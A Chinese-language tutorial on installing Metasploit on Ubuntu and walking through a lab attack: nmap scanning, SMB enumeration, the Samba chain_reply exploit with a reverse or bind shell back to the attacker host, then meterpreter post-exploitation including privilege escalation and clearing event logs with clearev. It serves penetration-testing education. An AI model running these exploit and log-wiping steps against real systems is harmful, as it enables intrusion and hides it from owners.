实践代码教你学会 Metasploit 渗透攻击【Ubuntu版本】

2023-12-19 12:12

本文主要是介绍实践代码教你学会 Metasploit 渗透攻击【Ubuntu版本】,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

文章目录

    • 一. Metasploit 渗透工具
    • 二. 安装配置
    • 三. 模块讲解
      • 3.1 auxiliary-辅助模块
      • 3.2 exploit-渗透攻击模块
      • 3.3 payload-攻击荷载模块
    • 四. 模拟攻击
      • 4.1 准备工作
      • 4.2 漏洞探测
      • 4.3 漏洞利用
      • 4.4 后渗透操作

一. Metasploit 渗透工具


Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程

二. 安装配置

切换至准备下载软件的目录下

cd /opt

下载

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

msf默认使用的PostgreSQL数据库不能与root用户关联,所以我们需要添加新用户msf,并且每次启动msf,都需要切换用户,否则数据库无法同步

# 添加msf用户
adduser msf
# 切换到msf用户
su msf
# 切换到msf所在的目录
cd  /opt/metasploit-framework/bin
# 启动msfconsole
./msfconsole

在这里插入图片描述

可将metasploit添加至执行目录,往后在任何目录直接msfconsole就可以

ln -s /opt/metasploit-framework/bin/msfconsole /usr/bin/msfconsole

更新msf(可选)

# MSF后期更新升级
msfupdate

三. 模块讲解

3.1 auxiliary-辅助模块


辅助模块

该模块不会直接在测试者和目标主机之间建立访问,它们只负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试。

查看辅助模块

show auxiliary/xxx

3.2 exploit-渗透攻击模块


渗透攻击模块

是利用发现的安全漏洞或配置弱点对远程目标进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问的一个代码模块

查看不同系统的可利用漏洞

search exploits/xxxx

3.3 payload-攻击荷载模块


攻击荷载模块

攻击载荷是渗透目标系统之后完成实际攻击功能的代码,用于在目标系统上运行任意命令或者执行特定代码。

查看可用代码

# 查看可用代码
search payloads/xxxx

组成

  • Single:完全独立的Payload,运行简单,例如添加一个系统用户或删除一份文件。

    • 格式:形如target/single ,如:windows/powershell_bind_tcp
  • Stager:负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。

  • Stage:是Stager下的一种组件,可以提供更加高级的功能

    • 格式:形如target/stage/stager, 如:windows/meterpreter/reverse_tcp,包含一个Stage Payload(meterpreter)和 一个Stager Payload(reverse_tcp)组成。

四. 模拟攻击

4.1 准备工作


被渗透机器:10.137.5.2,先给被渗透的机器安装一些服务,便于被发现

apt-get install vsftpd
apt-get install openssh-server
apt-get install telnet
apt-get install postfix
apt-get install samba

攻击机器为:10.137.5.1,安装namp用作服务和端口扫描

apt-get install nmap

开始扫描目标机器,注意要在root权限下运行命令

# -sS:表示这是一个基本的扫描方式,Nmap发送SYN包到远程主机,但不会在目标主机上产生任何日志记录
# -sV:用来扫描目标主机和端口上运行的软件的版本
# -n:不进行dns解析操作
nmap -sS -sV -n 10.137.5.2

在这里插入图片描述

表示总共运行了如下服务和开启如下端口

服务端口
vsftpd21
Openssh22
smtpd25
samba139 和 445

4.2 漏洞探测


首先进入框架

msfconsole

假设利用samba服务渗透,搜索相关扫描漏洞,选择一个漏洞进行渗透

search scanner/smb

在这里插入图片描述

选择漏洞探测,一般Auxiliary就是负责执行扫描

use auxiliary/scanner/smb/smb_enumshares

查看该模块所需的配置信息

show options

在这里插入图片描述

设置要探测的远程目标

set rhosts 10.137.5.2

对该主机进行渗透攻击,正常情况下,有+号的就是可能存在漏洞的主机

exploit

在这里插入图片描述

4.3 漏洞利用


查找利用漏洞

search linux/samba

在这里插入图片描述

选择漏洞攻击

use linux/samba/chain_reply

查看设置参数

show options

在这里插入图片描述

可以看见我们只需要设置探测的远程目标即可

set rhosts 10.137.5.2

可以看见,已默认选择了一种攻击方式linux/x86/meterpreter/reverse_tcp

在这里插入图片描述
如果不满意,可以查看攻击荷载

show  payloads

在这里插入图片描述
再额外设置攻击荷载,记住要选择了linux版本,例如

set payload payload/linux/x86/shell_bind_tcp

再次查看需配置参数,发现已经被更改

show options

其中lport,表示反弹shell到我们主机的这个端口

在这里插入图片描述

设置回弹主机地址

set lhost 10.137.5.1

进行攻击

exploit

理论上,在这里就已经攻击成功,但是由于版本更新的问题,很多软件已经被修复漏洞,根本无法成功渗透,如需成功渗透,可尝试使用低版本的软件或系统

4.4 后渗透操作


运行成功之后,我们将会看到命令提示符 meterpreter > 出现,输入shell进入目标主机终端

shell

退出终端,回到meterpreter

exit

meterpreter下,我们可以进行如下操作

命令含义命令含义
sysinfo查看主机消息pwd查看当前目录
cd切换文件夹cat查看文件内容
rm删除文件edit编辑文件
ls查看文件详情mkdir创建目录
download file下载文件upload file上传文件
screenshot截图getsystem权限提升

使用完毕getsystem,清除操作日志

clearev

挂载getsystem ,回到msf框架

background

查看保存的shell会话

sessions -l

输入session [id]即可再次进入终端

session 2

这篇关于实践代码教你学会 Metasploit 渗透攻击【Ubuntu版本】的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/512114

相关文章

Java进行日期解析与格式化的实现代码

《Java进行日期解析与格式化的实现代码》使用Java搭配ApacheCommonsLang3和Natty库,可以实现灵活高效的日期解析与格式化,本文将通过相关示例为大家讲讲具体的实践操作,需要的可以... 目录一、背景二、依赖介绍1. Apache Commons Lang32. Natty三、核心实现代

使用Python自动化生成PPT并结合LLM生成内容的代码解析

《使用Python自动化生成PPT并结合LLM生成内容的代码解析》PowerPoint是常用的文档工具,但手动设计和排版耗时耗力,本文将展示如何通过Python自动化提取PPT样式并生成新PPT,同时... 目录核心代码解析1. 提取 PPT 样式到 jsON关键步骤:代码片段:2. 应用 JSON 样式到

Spring Boot集成SLF4j从基础到高级实践(最新推荐)

《SpringBoot集成SLF4j从基础到高级实践(最新推荐)》SLF4j(SimpleLoggingFacadeforJava)是一个日志门面(Facade),不是具体的日志实现,这篇文章主要介... 目录一、日志框架概述与SLF4j简介1.1 为什么需要日志框架1.2 主流日志框架对比1.3 SLF4

ubuntu如何部署Dify以及安装Docker? Dify安装部署指南

《ubuntu如何部署Dify以及安装Docker?Dify安装部署指南》Dify是一个开源的大模型应用开发平台,允许用户快速构建和部署基于大语言模型的应用,ubuntu如何部署Dify呢?详细请... Dify是个不错的开源LLM应用开发平台,提供从 Agent 构建到 AI workflow 编排、RA

ubuntu系统使用官方操作命令升级Dify指南

《ubuntu系统使用官方操作命令升级Dify指南》Dify支持自动化执行、日志记录和结果管理,适用于数据处理、模型训练和部署等场景,今天我们就来看看ubuntu系统中使用官方操作命令升级Dify的方... Dify 是一个基于 docker 的工作流管理工具,旨在简化机器学习和数据科学领域的多步骤工作流。

SpringBoot实现二维码生成的详细步骤与完整代码

《SpringBoot实现二维码生成的详细步骤与完整代码》如今,二维码的应用场景非常广泛,从支付到信息分享,二维码都扮演着重要角色,SpringBoot是一个非常流行的Java基于Spring框架的微... 目录一、环境搭建二、创建 Spring Boot 项目三、引入二维码生成依赖四、编写二维码生成代码五

如何在Ubuntu上安装NVIDIA显卡驱动? Ubuntu安装英伟达显卡驱动教程

《如何在Ubuntu上安装NVIDIA显卡驱动?Ubuntu安装英伟达显卡驱动教程》Windows系统不同,Linux系统通常不会自动安装专有显卡驱动,今天我们就来看看Ubuntu系统安装英伟达显卡... 对于使用NVIDIA显卡的Ubuntu用户来说,正确安装显卡驱动是获得最佳图形性能的关键。与Windo

Android NDK版本迭代与FFmpeg交叉编译完全指南

《AndroidNDK版本迭代与FFmpeg交叉编译完全指南》在Android开发中,使用NDK进行原生代码开发是一项常见需求,特别是当我们需要集成FFmpeg这样的多媒体处理库时,本文将深入分析A... 目录一、android NDK版本迭代分界线二、FFmpeg交叉编译关键注意事项三、完整编译脚本示例四

Spring Boot 常用注解详解与使用最佳实践建议

《SpringBoot常用注解详解与使用最佳实践建议》:本文主要介绍SpringBoot常用注解详解与使用最佳实践建议,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要... 目录一、核心启动注解1. @SpringBootApplication2. @EnableAutoConfi

查看MySQL数据库版本的四种方法

《查看MySQL数据库版本的四种方法》查看MySQL数据库的版本信息可以通过多种方法实现,包括使用命令行工具、SQL查询语句和图形化管理工具等,以下是详细的步骤和示例代码,需要的朋友可以参考下... 目录方法一:使用命令行工具1. 使用 mysql 命令示例:方法二:使用 mysqladmin 命令示例:方